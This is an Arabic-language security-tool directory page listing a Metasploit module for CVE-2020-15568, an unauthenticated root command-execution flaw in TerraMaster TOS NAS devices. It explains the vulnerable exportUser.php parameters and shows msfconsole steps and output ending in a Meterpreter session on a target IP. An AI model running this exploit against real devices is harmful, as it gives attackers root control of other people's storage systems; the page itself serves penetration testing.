Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
TerraMaster-TOS-CVE-2020-15568 — مستودع لوحدة Metasploit لـ CVE-2020-15568 | Kitploit
أدوات/GitHubGitHub/divinepwner/terramaster-tos-cve-2020-15568
أطر الاستغلالتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubdivinepwner/terramaster-tos-cve-2020-15568

TerraMaster-TOS-CVE-2020-15568

مستودع لوحدة Metasploit لـ CVE-2020-15568

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
3منذ 3 سنواتلم تتم المراجعة بعد

TerraMaster TOS CVE-2020-15568

مستودع لوحدة Metasploit الخاصة بـ CVE-2020-15568

التطبيق الضعيف

الوصف

توجد ثغرة استدعاء ديناميكي لطريقة فئة في الملف include/exportUser.php مما يؤدي إلى تنفيذ أوامر عن بُعد على أجهزة TerraMaster بصلاحيات الجذر (root). يتطلب الملف الضعيف توفير عدة معاملات HTTP GET من أجل الوصول إلى استدعاء الطريقة واستغلال هذه الثغرة. في السطر الأول، يقوم التطبيق بتضمين app.php الذي يقوم بتحميل الفئات الأساسية ذات الصلة من برنامج TOS تلقائياً. يحدد التطبيق العملية بناءً على قيمة معامل GET type. إذا كانت قيمة متغير type مختلفة عن 1 أو 2، فمن الممكن الوصول إلى الكود الضعيف. في الكود المصدري لـ exportUser.php، يتطلب التطبيق معاملات HTTP GET: cla (اختصار لـ class)، func، و opt.

أثناء مراجعة الكود لملفات أخرى أيضاً، تم اكتشاف أن هناك طريقة لاستغلال هذه المشكلة باستخدام فئات موجودة مسبقاً في برنامج TOS. فئة PHP الموجودة في include/class/application.class.php هي أفضل مرشح لتنفيذ الأوامر على الأجهزة التي تعمل ببرنامج TOS. نظراً لعدم وجود ضوابط مصادقة في exportUser.php، فمن الممكن لمهاجم غير مصادق الوصول إلى تنفيذ الأوامر.

خطوات التحقق

  1. قم بإعداد جهاز NAS من TerraMaster يعمل بنظام TOS الإصدار 4.1.24 أو أقل.
  2. ابدأ تشغيل msfconsole.
  3. نفّذ الأمر: use exploit/multi/http/terramaster_command_exec
  4. نفّذ الأمر: set rhost 192.168.1.27
  5. نفّذ الأمر: check
root@kitploit:~
[+] 192.168.1.27:80 - الهدف ضعيف.

الأهداف

root@kitploit:~
أهداف الاستغلال:
   المعرف  الاسم
   --     ----
   0      تلقائي

السيناريوهات

root@kitploit:~
msf5 > use exploit/multi/http/terra_master_command_exec 
msf5 exploit(exploit/multi/http/terramaster_command_exec) > set rhost 192.168.1.27
rhost => 192.168.1.27
msf5 exploit(multi/http/terramaster_command_exec) > run
[+] تم رفع الحمولة إلى /logs/FJETBHLL/.vatw.php
[+] تم تشغيل الحمولة بنجاح!
[*] بدء معالج TCP المقيد ضد 192.168.1.27:9090
[*] إرسال المرحلة (38288 بايت) إلى 192.168.1.27
[*] جلسة Meterpreter 1 مفتوحة (0.0.0.0:0 -> 192.168.1.27:9090) بتاريخ 2020-07-23 09:49:34 +0300
meterpreter >
تنزيل الأداة